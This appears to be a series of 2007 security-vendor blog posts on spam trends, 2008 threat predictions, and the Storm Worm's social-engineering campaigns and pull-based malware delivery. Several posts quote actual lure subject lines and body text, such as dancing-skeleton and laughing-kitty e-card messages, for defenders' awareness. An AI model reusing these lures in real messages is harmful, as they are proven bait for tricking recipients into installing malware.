PDF spam forced the industry to react quickly and make sure that it was treating messages as holistic entities examining not only message headers and body content, but the content of attachments to ensure that spam content was not being hidden in there.

Although PDF spam volumes were short lived, they highlighted the rapid movement away from image spam to the point where image spam is currently less than 3% of all spam volume that we see. PDF spam also introduced additional challenges that image spam did not. Not only were messages larger due to the existence of the PDF attachment (this was a similar characteristic of what we saw with image spam so at least this in itself did not introduce any new challenges), but since PDFs need to be scanned for potential malcode they required the additional system resources of a virus scan. Many more CPU cycles were being chewed by processing PDF spam as opposed to its image based predecessor. PDF spam lasted in large quantities for only about a month.

As PDF spam waned we have been seeing some minimal increases in other types of attachment based spam with spam sometimes appearing within the body of a Word doc or an Excel spreadsheet. Volumes of this type of spam are still quite low, but could easily be leveraged for a wide scale attack similar to how PDF spam was used. Most of the tactics now have gone back to what I call "old school" style spam where spammers have been resorting back to text obfuscations in an effort to get their junk through spam filters.

So, as you can see, a lot has happened in 2007 and the forecast for 2008 looks to bring about some new challenges as these existing threats evolve and as new ones emerge. If you'd like some more information on what we expect to see next year and forward, feel free to read my 2008 predictions blog. In the meantime, here's to hoping everyone has a safe and wonderful holiday season.

As we near the end of another year I can say with surety that 2007 will be remembered among spam and malware filtering companies as the year of the Storm Worm. In 2005 it was the year of the Sober worm, but 2007 has most definitely been owned by Storm and its many variants.

So, as we close out 2007 we start to look forward to 2008. What are some of the 2007 trends that we expect to continue in 2008? What will be new? How will current trends evolve?

Here are some of my random thoughts:

-- We will see an increased prevalence of Web 2.0 attacks.

When we talk about "Web 2.0" we are talking mostly about interactive communities like blogs, wikis, and social networking sites like MySpace and Facebook. Web 2.0 sites provide a richer, more interactive internet experience for its users which extends the internet beyond just your typical "download content and view pages" approach and puts users in more control over the content.

From a user experience perspective, this is a great idea, but typically what makes things easier for the user carries along with it some level of security implication.

As part of the Web 2.0 experience, more code execution is being pushed to the client browser. This doesn't necessarily change the types of attacks that exist in Web 2.0 applications versus Web 1.0 applications (attacks like XSS, SQL Injection, and CSRF still exist just as they did before), but now will manifest themselves in different ways. As such it will be the responsibility of the application developer to be more aware of client side input validation and make sure that potentially malicious code never makes it from the "untrusted" user environment to a site's "trusted" backend infrastructure. Cyber criminals will try to exploit these potential vulnerabilities in code validation as much as possible.

-- We will see an increase in "blended threats" in 2008.

If you are not familiar with the term "blended threat" it is a combination type of threat which will mix the data stealing capabilities of malware with backdoor botnet capabilities. What this means is that if you are infected with one of these hybrid types of malware you could have a keylogger installed on your machine which is logging your keystrokes and sending your potentially confidential and personally identifiable information to a cyber crook for sale in the underground community, but your machine is also available as a spam zombie such that botnet herders can rent time on your computer to send out spam/viruses/etc.

The holiday season is a particularly interesting time to potentially see these types of threats also because of the amount of online shopping that takes place in the 5 weeks between Thanksgiving and Christmas. comScore recently released their Cyber Monday 2007 Statistics which showed that $733 million dollars was spent online on Cyber Monday (the Monday after the Thanksgiving weekend) alone. This is obviously a target that is too large for criminals to ignore.

-- Abuse will continue to move into other forms of communication

We've already seen some of this in 2007, but is something that we expect to continue not only into 2008 but beyond.

Mobile phone and PDA abuse is already a big problem in places like Europe and Japan. It isn't so much so yet in the United States, but as smartphones make more of a movement into the space where they allow the development and installation of third party applications users will need to be continually wary of the security implications of these new conveniences. The line between the PC and the phone is becoming blurrier every day and as such mobile computing devices will soon need to deploy the same types of security suites that should be installed on every desktop and laptop PC.

We also expect to see more tele-spam (spam sent via VoIP technologies) and voicemail injection (the compromising of vulnerable VoIP systems to inject spam voicemail directly into a user's voicemail inbox.

In the vein of "targets too large for criminals to ignore" the smartphone industry is expected to be a $250B industry by 2011. You can be sure that cyber criminals will do whatever they can to get a piece of that pie!

-- Continued movement of malware away from email as a primary distribution vector.

This is another one of those trends that we have seen shift over the past year or two. Malware authors have already begun the movement from the "push" based method of infection that we have talked about previously (where static malware content is pushed to the user via an email attachment) to a "pull" based model where users pull the content from a web site, typically lured to by a link in either an email or an instant message.

The Storm Worm is actually a great example of this transition in action. Early versions of the Storm Worm pushed executable file attachments to unsuspecting users when opened would infect the user's PC with Storm. Later variants used social engineering tactics like fake, malicious e-cards to lure people to web sites to download more dynamic pieces of malware.

More and more viruses have been following this trend over the last year or two and we expect this trend to continue. By 2009 or 2010 we expect malware distribution by internet pull based methods to surpass email as a distribution vector making it the primary method of infection. The email virus is likely to never completely go away, but the dynamic nature of the web as a way to distribute malware carries many advantages that email's static nature does not.

-- More targetted phishing/malware attacks

What discussion about social engineering would be complete without a mention of the evolution of tactics by cyber criminals in an effort to establish legitimacy with their targets?

Social engineering has always been the key ingredient to the success or failure of any cyber crime campaign. If you can do it well, you will have a significant greater chance of success than if you don't. The Storm and Sober worms (the last two really successful email-borne malware campaigns) were successful because of the social engineering tactics they used (Paris Hilton videos, free World Cup tickets, and e-cards as a few examples). As cyber criminals continue to launch new campaigns, you can be certain that they will refine their social engineering tactics to the point where even the trained eye will have trouble quickly determining the (il)legitimacy of an email.

These attacks will also become more targeted similar to the government agency scams from earlier this year that were sent primarily to high C-level executives. Effective social engineering combined with good targeting methods virtually ensure that there will always be people who will fall for these scams which will always leave spam as a virtually 100% profitable venture.

Machines infected with the Storm Worm now have a new way to deliver spam to their owners: browser popup spam!

Joe Stewart, a security researcher for Secureworks, has been actively tracking the Storm Worm and its activities for quite some time now and has posted this image with a sample of the spam that users are receiving.

The scam is for stock symbol HPGI which is for a company named Hemisphere Gold. This stock was actually the target of a pump and dump email spam run which started a couple of days ago.

You can track the spam volumes sent out for this particular stock here.

You can track the ups and downs of the stock price here.

So, now you're thinking "Well, now I'll know if my PC is infected with Storm. I can just run my virus scanner and it'll be removed! What a dumb move on the part of the Storm authors!" Unfortunately, this won't work. One of the elements of Storm is that it contains a rootkit component which embeds itself into Windows drivers that handle primary operating system functions. You can't just delete these files because then you will be removing system files that Windows needs to run.

There are applications which exist that will look for and detect rootkits on your system, but it is unknown at this time whether or not those products have been updated in order to detect new Storm variants. Even if they detect this variant, Storm is very nimble and updates itself regularly. Even if it can identify and remediate one variant doesn't mean it has caught them all.

Just like 2005 was the year of the Sober worm, 2007 will be known as the year of the Storm Worm (and likely well into 2008 until something else comes along which is even more dastardly than Storm, which is a very scary concept!). This example is just another though in the theory that email is most certainly not the only threat vector anymore and that it is only a matter of time before the web passes email as a primary malware delivery vehicle.

As a follow up to the Halloween Storm Alert that we posted back on October 31st, it appears that we are seeing more of these dancing skeleton emails today. In fact, we have already seen about 4 times the volume of this Storm Worm variant today (at 2:30pm MST) than we saw all of Halloween day (over 4 million so far today, about 1 million on Halloween and only a few thousand per day in between).

Looks like the dancing skeleton enjoyed the first dance so much he came back for an encore.

In keeping with their trend of releasing new variants on or around holidays (at least here in the US), the Storm Worm folks have released yet a new Halloween variant.

This new variant has a Halloween related subject line like "Nothing is funnier this Halloween" and a message body such as "Come watch the little skeleton dance" followed by a URL where the Storm malware can be downloaded.

This blog post will be updated as more information becomes available.

Update 1: Here are some additional subject lines associated with this new variant:

To much fun

Show this to the kids

Make him dance

Watch him dance

Dancing Bones

Dancing skeleton

Happy Halloween

Halloween Fun

Have a Happy Halloween everyone

Party on this Halloween

For people with a sense of humor only

Send this to your friends

I am sending this to everyone

I played with this for hours

If your in your office, keep the speakers low

This will make you laugh

You'll laugh your but off

Man this is funny

Riding on the wave of popularity of e-card variants related to the Storm Worm, we now have another one to add to the mix: The Laughing Kitty.

Similar to other Storm Worm e-card variants the subject lines looks fairly innocuous in an attempt to get the recipient to open the message. Some subject lines that we have seen include:

"Someone is thinking of you! Open your ecard!"

"Have you seen this hilarious greeting?"

"Someone Just sent you an ecard!"

"You have one new ecard waiting!"

"This greeting's for you!"

The body text of the message contains text such as:

"You have been sent the Laughing Kitty kard"

"Click here to view your laughing kitty card online."

"Preview your Kitty card online. It is so funny!"

The message contains a link where the user will be prompted to download a file called "superlaugh.exe" which contains Storm malware code.

Rest assured that there is nothing funny about the laughing kitty.

Storm and its many variants have easily created the largest vector of attack since the Sober worm in 2005, and at this point has dwarfed it in botnet size, observed traffic volumes, and staying power.

Storm worm variants have been reported to have infected up to 50 million PCs worldwide. Thanks to its effective social engineering techniques and enormous botnet power at its disposal we expect it to continue to be a major player for some time to come continuing to send spam, additional Storm malware, DDoS attacks, and more!

We've been talking quite a bit lately about the move from "push" based malware to "pull" based. So I figured it was time to dedicate a full blog posting to it and its significance.

Again, pull based malware is generally web site hosted malware where the user "pulls" the content from the web site by virtue of visiting the site with their web browser.

This type of malware is especially dangerous for a couple of reasons:

-- It evades attachment filtering techniques (since there is no email attachment. The content comes via a web site link) -- The user generally has no idea that the site they visited is malicious -- Hackers can employ technologies like server side polymorphism to repack binaries for every download, thus rendering traditional signature based anti virus engines useless

We are starting to see more and more instances of common web site compromises where users can get infected without any lure (for example the 1st Congressional District GOP of Wisconsin was reported as compromised about a week ago by the same group that brought us the Storm Worm. In general, however these types of infections are still the exception, not the norm.

Speaking of the Storm Worm gang, they have actually created a hybrid between push and pull infections for some of their variants. These will look for a number of unpatched vulnerabilities on a victim's PC when launched and if it can't find any that it is looking for will direct the user to download and install the file manually. Even Vista's UAC system only provides rudimentary protection here. Since applications executed directly by the end user are considered trusted (Vista will ask you if you are sure you want to install the program, but who doesn't just click "Yes" to that prompt?) the user falls on their own sword and infects themselves. Nice, eh?

Typically when a user is being lured to a malicious web site multiple communication mediums are leveraged. Something has to let the user know that the site is available and accessible, right? That lure in many cases comes via email.

There is a distinct crossover between email and web defense solutions such the data collected from one can be used to make the other one more effective, creating a synergistic relationship between the systems. At least for the foreseeable future hackers are going to have to continue to use technologies like email in an attempt to get users infected. During that time having a solution which not only monitors and protects your inbound mail flow but also your outbound web browsing activities provides an effective defense-in-depth solution against malware and fraud.

Another day, another Storm worm tactic.

This new tactic is leveraging Youtube links in an effort to get users to click and download malicious code. The link sent via email looks like a properly formatted Youtube URL, but is actually directed toward a compromised web server. To avoid DNS the link goes to a numerical IP address instead of a hostname which is also easier to take down.

This is another example of pull based malware that we have been talking about more and more where the user has to go visit a web site (either by clicking a link or following instructions to go to a particular web site) in order to get infected as opposed to having the malware "pushed" to them via an email attachment.

This method of infection also forced the AV vendors to start employing URL based blacklists into their products such that malicious web sites can be proactively identified by the AV engine based on the web site address and not necessarily based on the hosted content. This is a good move on their part especially considering the increase (and expected continued prevalence) in server side polymorphic viruses.

Just like 2005 was the year of the Sober worm, 2007 will be known as the Year of the Storm.

Since late January we have seen Storm worm variants using social engineering tactics like news stories, current events, and e-cards in an attempt to get unsuspecting victims to open attachments, click links, and get infected to become the latest addition to the Storm Worm bot army.

The latest and greatest social engineering tactic that we started seeing on Saturday has now started using porn. This tactic, as with the e-card tactic, is using a pull based method of infection where the malware content is not "pushed" to the user via an attachment, rather the email sent contains a link where when clicked by the user causes them to "pull" it down.

The messages that we have been seeing with this new variant include the following either in the subject line or message body (this is only a partial list): "I need someone to please me. Check out my pictures", "Want me to show you what my room mate and I do when we get lonely at night", and "Taking these pictures made me so hot. I bet they will make you hot too" (I'll bet this post gets caught by a few spam filters :) ). This new variant is currently accounting for about 1 in 6 virus infected messages seen by the MX Logic Threat Operations Center within the last 24 hours.

So, why the movement to "pull" based malware instead of "push" based. For one, it is more difficult for end users to submit samples of the malware. If the attachment is pushed to the end user, they have all of the information that they need at their fingertips to submit to the anti-virus vendors. Secondly, with the pull based model users may not even know that they are going to a malicious web site so that when the visit the site it may display some kind of error message saying that the site was not available (or something innocuous as to not arouse suspicion) when in the background the user's PC just got infected with malware. This model also enables the malware authors to utilize a tactic known as "Server Side Polymorphism" where the way that the malware is packed can continually change on a per download basis thus rendering traditional signature based anti-virus engines ineffective. The version of the malware that I download could have an entirely different signature than the version someone else downloads even though we may have clicked through to the site at the exact same time.

We've been seeing more examples of pull based malware over the last couple of months, mostly related to the Storm worm but the BBB scam from a couple of months ago used this method as well. Pull based infection provides much greater flexibility for the malware authors in their attempts to stay one step ahead of the anti-virus engines and is something we will continue to see not only from Storm, but from other worm authors who learn from Storm's successes in their attempts to come up with new methods to get onto our PCs.